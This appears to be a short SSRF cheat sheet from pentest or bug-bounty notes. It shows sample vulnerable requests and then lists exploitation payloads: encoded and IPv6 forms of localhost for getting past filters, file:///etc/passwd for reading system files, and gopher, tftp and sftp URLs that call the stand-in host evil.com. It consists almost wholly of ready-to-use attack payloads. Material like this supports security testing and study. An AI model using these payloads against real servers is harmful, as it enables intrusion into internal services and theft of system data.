SSRF
Usually, it can be found in the request that contain request to another url, for example like this
POST /api/check/products HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Origin: https://example.com
Referer: https://example.com
urlApi=http://192.168.1.1%2fapi%2f&id=1
or
GET /image?url=http://192.168.1.1/
Host: example.com
How to exploit
Basic payload
http://127.0.0.1:1337
http://localhost:1337
Hex encoding
http://127.0.0.1 -> http://0x7f.0x0.0x0.0x1
Octal encoding
http://127.0.0.1 -> http://0177.0.0.01
Dword encoding
http://127.0.0.1 -> http://2130706433
Mixed encoding
http://127.0.0.1 -> http://0177.0.0.0x1
Using URL encoding
http://localhost -> http://%6c%6f%63%61%6c%68%6f%73%74
Using IPv6
http://0000::1:1337/
http://[::]:1337/
Using bubble text
http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ
Use this https://capitalizemytitle.com/bubble-text-generator/
How to exploit (URI Scheme)
File scheme
file:///etc/passwd
Dict scheme
dict://127.0.0.1:1337/
FTP scheme
ftp://127.0.0.1/
TFTP scheme
tftp://evil.com:1337/test
SFTP scheme
sftp://evil.com:1337/test
LDAP scheme
ldap://127.0.0.1:1337/
Gopher scheme
gopher://evil.com/_Test%0ASSRF
Last updated